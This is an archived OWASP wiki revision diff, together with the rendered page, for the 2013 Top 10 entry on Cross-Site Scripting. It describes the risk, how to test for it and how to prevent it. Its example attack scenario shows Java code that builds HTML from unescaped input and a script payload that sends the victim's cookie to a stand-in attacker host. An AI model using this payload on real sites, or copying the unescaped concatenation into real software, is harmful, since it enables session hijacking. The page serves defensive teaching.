This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Top 10 2013-A3-Cross-Site Scripting (XSS)"

From OWASP
Jump to: navigation, search
m (Edit links.)
 
(14 intermediate revisions by 4 users not shown)
Line 1: Line 1:
 
{{Top_10_2013:TopTemplate
 
{{Top_10_2013:TopTemplate
 
     |usenext=2013NextLink
 
     |usenext=2013NextLink
     |next={{Top_10_2010:ByTheNumbers
+
     |next=A4-{{Top_10_2010:ByTheNumbers
 
               |4
 
               |4
               |year=2013}}
+
               |year=2013
 +
              |language=en}}
 
     |useprev=2013PrevLink
 
     |useprev=2013PrevLink
     |prev={{Top_10_2010:ByTheNumbers
+
     |prev=A2-{{Top_10_2010:ByTheNumbers
 
               |2
 
               |2
               |year=2013}}
+
               |year=2013
 +
              |language=en}}
 +
    |year=2013
 +
    |language=en
 
}}
 
}}
  
{{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013}}
+
{{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013|language=en}}
{{Top_10_2010:SummaryTableValue-2-Template|Exploitability|AVERAGE|year=2013}}
+
{{Top_10:SummaryTableTemplate|exploitability=2|prevalence=0|detectability=1|impact=2|year=2013|language=en}}
{{Top_10_2010:SummaryTableValue-0-Template|Prevalence|VERY WIDESPREAD|year=2013}}
 
{{Top_10_2010:SummaryTableValue-1-Template|Detectability|EASY|year=2013}}
 
{{Top_10_2010:SummaryTableValue-2-Template|Impact|MODERATE|year=2013}}
 
 
{{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}}
 
{{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}}
     <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.
+
     <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
.</td>
+
Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.
    <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Attacker sends text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.
 
 
</td>
 
</td>
     <td colspan=2  {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>XSS is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content. There are three known types of XSS flaws: 1) Stored, 2) Reflected, and 3) DOM based XSS.
+
     <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
Detection of most XSS flaws is fairly easy via testing or code analysis.
+
Attacker sends text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.
 
</td>
 
</td>
     <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.
+
 
 +
     <td colspan=2  {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
 +
[[Cross-site_Scripting_(XSS) | XSS]] is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content. There are two different types of XSS flaws: 1) [[Cross-site_Scripting_(XSS) | Stored]] and 2) [[Cross-site_Scripting_(XSS) | Reflected]], and each of these can occur on the a) [[Types_of_Cross-Site_Scripting#Server_XSS | Server ]] or b) on the [[Types_of_Cross-Site_Scripting#Client_XSS | Client]].
 +
 
 +
Detection of most [[Types_of_Cross-Site_Scripting#Server_XSS | Server XSS]] flaws is fairly easy via testing or code analysis. [[Types_of_Cross-Site_Scripting#Client_XSS | Client XSS]] is very difficult to identify.
 +
</td>
 +
    <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
 +
Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.
 +
 
 
</td>
 
</td>
 
     <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Consider the business value of the affected system and all the data it processes.
 
     <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Consider the business value of the affected system and all the data it processes.
Line 30: Line 38:
 
{{Top_10_2010:SummaryTableEndTemplate}}
 
{{Top_10_2010:SummaryTableEndTemplate}}
  
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=1|risk=3|year=2013}}
+
{{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=3|year=2013|language=en}}
You need to ensure that all user supplied input sent back to the browser is properly escaped before it is included in the output page, or it is verified to be safe via input validation. Proper output encoding ensures that such input is always treated as text in the browser, rather than active content. If AJAX is being used to dynamically update the page, you should try to use safe JavaScript APIs. For unsafe JavaScript APIs, encoding or validation must be used.
+
 
 +
You are vulnerable if you do not ensure that all user supplied input is properly escaped, or you do not verify it to be safe via server-side input validation, before including that input in the output page. Without proper output escaping or validation, such input will be treated as active content in the browser. If Ajax is being used to dynamically update the page, are you using [https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf  safe JavaScript APIs]? For unsafe JavaScript APIs, encoding or validation must also be used.
 +
 
 +
Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, making automated detection difficult. Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.
  
Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, which makes automated detection difficult. Therefore, complete coverage requires a combination of manual code review and pen testing, in addition to automated approaches.
+
Web 2.0 technologies, such as Ajax, make XSS much more difficult to detect via automated tools.
  
Web 2.0 technologies, such as AJAX, make XSS much more difficult to detect via automated tools.
+
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=3|year=2013|language=en}}
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=2|risk=3|year=2013}}
+
Preventing XSS requires separation of untrusted data from active browser content.
How Do I Prevent XSS?
+
# The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the [[XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet | OWASP XSS Prevention Cheat Sheet]] for details on the required data escaping techniques.
Preventing XSS requires keeping untrusted data separate from active browser content.
+
# Positive or “whitelist” server-side input validation is also recommended as it helps protect against XSS, but is <u>not a complete defense</u> as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.
# The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the OWASP XSS Prevention Cheat Sheet for details on the required data escaping techniques.
+
# For rich content, consider auto-sanitization libraries like OWASP’s [[AntiSamy]] or the [[OWASP_Java_HTML_Sanitizer_Project | Java HTML Sanitizer Project]].
# Positive or “whitelist” input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.
+
# Consider [[Content Security Policy]] (CSP) to defend against XSS across your entire site.
# For rich content, consider auto-sanitization libraries like OWASP’s AntiSamy.
 
  
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=3|risk=3|year=2013}}
+
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=3|year=2013|language=en}}
 
The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:
 
The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:
  
{{Top_10_2010:ExampleBeginTemplate}}<span style="color:red;">
+
{{Top_10_2010:ExampleBeginTemplate|year=2013}}<span style="color:red;">
(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
+
(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
 +
 
 
</span>{{Top_10_2010:ExampleEndTemplate}}
 
</span>{{Top_10_2010:ExampleEndTemplate}}
  
 
The attacker modifies the 'CC' parameter in their browser to:
 
The attacker modifies the 'CC' parameter in their browser to:
  
{{Top_10_2010:ExampleBeginTemplate}}<span style="color:red;">
+
{{Top_10_2010:ExampleBeginTemplate|year=2013}}<span style="color:red;">
'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
+
<span style="color:red;">'><script>document.location=
 +
'<nowiki>h</nowiki>ttp://www.attacker.com/cgi-bin/cookie.cgi
 +
?foo='+document.cookie</script>'.</span>
 +
 
 
</span>{{Top_10_2010:ExampleEndTemplate}}
 
</span>{{Top_10_2010:ExampleEndTemplate}}
  
 
This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.  
 
This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.  
 +
 
Note that attackers can also use XSS to defeat any  automated CSRF defense the application might employ. See A8 for info on CSRF.
 
Note that attackers can also use XSS to defeat any  automated CSRF defense the application might employ. See A8 for info on CSRF.
Detection of most XSS flaws is fairly easy via testing or code analysis.
 
  
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=4|risk=3|year=2013}}
+
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=3|year=2013|language=en}}
 
{{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}
 
{{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}
 +
* [[Types of Cross-Site Scripting]]
 +
* [[XSS (Cross Site Scripting) Prevention Cheat Sheet | OWASP XSS Prevention Cheat Sheet
 +
]]
 +
* [[DOM_based_XSS_Prevention_Cheat_Sheet | OWASP DOM based XSS Prevention Cheat Sheet]]
 +
* [[Cross-site_Scripting_(XSS) | OWASP Cross-Site Scripting Article]]
 +
* [https://static.javadoc.io/org.owasp.esapi/esapi/2.1.0.1/org/owasp/esapi/Encoder.html ESAPI Encoder API]
 +
* [[ASVS | ASVS: Output Encoding/Escaping Requirements (V6)]]
 +
* [[AntiSamy | OWASP AntiSamy: Sanitization Library]]
 +
* [[Testing_for_Data_Validation | Testing Guide: 1st 3 Chapters on Data Validation Testing]]
 +
* [[Reviewing_Code_for_Cross-site_scripting | OWASP Code Review Guide: Chapter on XSS Review]]
 +
* [[XSS_Filter_Evasion_Cheat_Sheet | OWASP XSS Filter Evasion Cheat Sheet]]
  
OWASP XSS Prevention Cheat Sheet
+
{{Top_10_2010:SubSubsectionExternalReferencesTemplate|language=en}}
OWASP DOM based XSS Prevention Cheat Sheet
+
* [http://cwe.mitre.org/data/definitions/79.html CWE Entry 79 on Cross-Site Scripting]
OWASP Cross-Site Scripting Article
 
ESAPI Encoder API
 
ASVS: Output Encoding/Escaping Requirements (V6)
 
OWASP AntiSamy: Sanitization Library
 
Testing Guide: 1st 3 Chapters on Data Validation Testing
 
OWASP Code Review Guide: Chapter on XSS Review
 
OWASP XSS Filter Evasion Cheat Sheet
 
External
 
CWE Entry 79 on Cross-Site Scripting
 
  
 
{{Top_10_2013:BottomAdvancedTemplate
 
{{Top_10_2013:BottomAdvancedTemplate
 
     |type={{Top_10_2010:StyleTemplate}}
 
     |type={{Top_10_2010:StyleTemplate}}
 
     |usenext=2013NextLink
 
     |usenext=2013NextLink
     |next={{Top_10_2010:ByTheNumbers
+
     |next=A4-{{Top_10_2010:ByTheNumbers
 
               |4
 
               |4
               |year=2013}}
+
               |year=2013
 +
              |language=en}}
 
     |useprev=2013PrevLink
 
     |useprev=2013PrevLink
     |prev={{Top_10_2010:ByTheNumbers
+
     |prev=A2-{{Top_10_2010:ByTheNumbers
 
               |2
 
               |2
               |year=2013}}}}
+
               |year=2013
 +
              |language=en}}
 +
    |year=2013
 +
    |language=en
 +
}}

Latest revision as of 18:30, 19 March 2017

NOTE: THIS IS NOT THE LATEST VERSION. Please visit the OWASP Top 10 project page to find the latest edition.

← A2-Broken Authentication and Session Management
2013 Table of Contents

2013 Top 10 List

A4-Insecure Direct Object References →
Threat Agents Attack Vectors Security Weakness Technical Impacts Business Impacts
Application Specific Exploitability
AVERAGE
Prevalence
VERY WIDESPREAD
Detectability
EASY
Impact
MODERATE
Application / Business Specific

Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.

Attacker sends text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.

XSS is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content. There are two different types of XSS flaws: 1) Stored and 2) Reflected, and each of these can occur on the a) Server or b) on the Client.

Detection of most Server XSS flaws is fairly easy via testing or code analysis. Client XSS is very difficult to identify.

Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.

Consider the business value of the affected system and all the data it processes.

Also consider the business impact of public exposure of the vulnerability.

Am I Vulnerable To 'Cross-Site Scripting (XSS)'?

You are vulnerable if you do not ensure that all user supplied input is properly escaped, or you do not verify it to be safe via server-side input validation, before including that input in the output page. Without proper output escaping or validation, such input will be treated as active content in the browser. If Ajax is being used to dynamically update the page, are you using safe JavaScript APIs? For unsafe JavaScript APIs, encoding or validation must also be used.

Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, making automated detection difficult. Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.

Web 2.0 technologies, such as Ajax, make XSS much more difficult to detect via automated tools.

How Do I Prevent 'Cross-Site Scripting (XSS)'?

Preventing XSS requires separation of untrusted data from active browser content.

  1. The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the OWASP XSS Prevention Cheat Sheet for details on the required data escaping techniques.
  2. Positive or “whitelist” server-side input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.
  3. For rich content, consider auto-sanitization libraries like OWASP’s AntiSamy or the Java HTML Sanitizer Project.
  4. Consider Content Security Policy (CSP) to defend against XSS across your entire site.
Example Attack Scenarios

The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker modifies the 'CC' parameter in their browser to:

'><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi ?foo='+document.cookie</script>'.

This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.

Note that attackers can also use XSS to defeat any automated CSRF defense the application might employ. See A8 for info on CSRF.

References

OWASP

External

← A2-Broken Authentication and Session Management
2013 Table of Contents

2013 Top 10 List

A4-Insecure Direct Object References →

© 2002-2013 OWASP Foundation This document is licensed under the Creative Commons Attribution-ShareAlike 3.0 license. Some rights reserved. CC-by-sa-3 0-88x31.png